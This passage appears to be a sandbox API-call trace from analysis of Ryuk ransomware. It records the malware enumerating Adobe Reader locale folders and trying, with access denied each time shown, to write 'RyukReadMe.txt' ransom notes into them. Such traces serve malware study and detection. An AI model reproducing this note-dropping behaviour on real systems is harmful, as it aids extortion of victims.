[0138.589] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.590] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.590] SetLastError (dwErrCode=0x0) [0138.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\fr_fr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.590] GetLastError () returned 0x5 [0138.590] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.590] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.590] SetLastError (dwErrCode=0x0) [0138.590] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.590] GetLastError () returned 0x5 [0138.590] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.590] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.591] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.597] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.597] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.597] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.598] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.598] SetLastError (dwErrCode=0x0) [0138.598] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.598] GetLastError () returned 0x5 [0138.598] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.598] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.598] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.599] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.599] SetLastError (dwErrCode=0x0) [0138.599] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.599] GetLastError () returned 0x5 [0138.599] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.600] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.600] SetLastError (dwErrCode=0x0) [0138.600] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.600] GetLastError () returned 0x5 [0138.600] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.600] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.600] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.602] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.602] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.607] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.607] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.607] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.607] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.607] SetLastError (dwErrCode=0x0) [0138.608] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.608] GetLastError () returned 0x5 [0138.608] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.608] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.608] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.609] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.609] SetLastError (dwErrCode=0x0) [0138.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.609] GetLastError () returned 0x5 [0138.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.609] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.609] SetLastError (dwErrCode=0x0) [0138.609] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.609] GetLastError () returned 0x5 [0138.609] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.609] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.609] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.611] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.611] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.621] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.622] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.622] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.622] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.622] SetLastError (dwErrCode=0x0) [0138.622] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.622] GetLastError () returned 0x5 [0138.622] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.622] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.622] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.623] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.623] SetLastError (dwErrCode=0x0) [0138.623] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.623] GetLastError () returned 0x5 [0138.623] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.623] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.623] SetLastError (dwErrCode=0x0) [0138.623] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.623] GetLastError () returned 0x5 [0138.623] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.623] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.623] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.625] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.625] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.630] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.630] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.631] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.631] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.631] SetLastError (dwErrCode=0x0) [0138.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.631] GetLastError () returned 0x5 [0138.631] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.631] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.631] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.634] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.634] SetLastError (dwErrCode=0x0) [0138.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ja_JP\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ja_jp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.634] GetLastError () returned 0x5 [0138.634] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.634] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.634] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.634] SetLastError (dwErrCode=0x0) [0138.634] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.635] GetLastError () returned 0x5 [0138.635] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.635] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.635] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.636] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.636] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.641] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.641] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.641] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.642] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.642] SetLastError (dwErrCode=0x0) [0138.642] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.642] GetLastError () returned 0x5 [0138.642] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.643] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.643] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.643] SetLastError (dwErrCode=0x0) [0138.643] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ko_KR\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ko_kr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.643] GetLastError () returned 0x5 [0138.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.643] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.643] SetLastError (dwErrCode=0x0) [0138.643] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.643] GetLastError () returned 0x5 [0138.643] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.643] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.643] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.645] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.645] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.651] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.651] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.651] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.651] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.651] SetLastError (dwErrCode=0x0) [0138.651] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.651] GetLastError () returned 0x5 [0138.651] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.651] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.652] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.652] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.652] SetLastError (dwErrCode=0x0) [0138.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nb_NO\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nb_no\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.652] GetLastError () returned 0x5 [0138.652] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.652] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.652] SetLastError (dwErrCode=0x0) [0138.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.652] GetLastError () returned 0x5 [0138.652] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0138.652] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.652] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0138.654] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.654] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.658] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0138.658] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.658] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0138.659] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0138.659] SetLastError (dwErrCode=0x0) [0138.659] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\Services\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\services\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.659] GetLastError () returned 0x5 [0138.659] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0138.659] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.659] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0138.659] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0138.660] SetLastError (dwErrCode=0x0) [0138.660] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\nl_NL\\RyukReadMe.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\nl_nl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.660] GetLastError () returned 0x5 [0138.660] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, 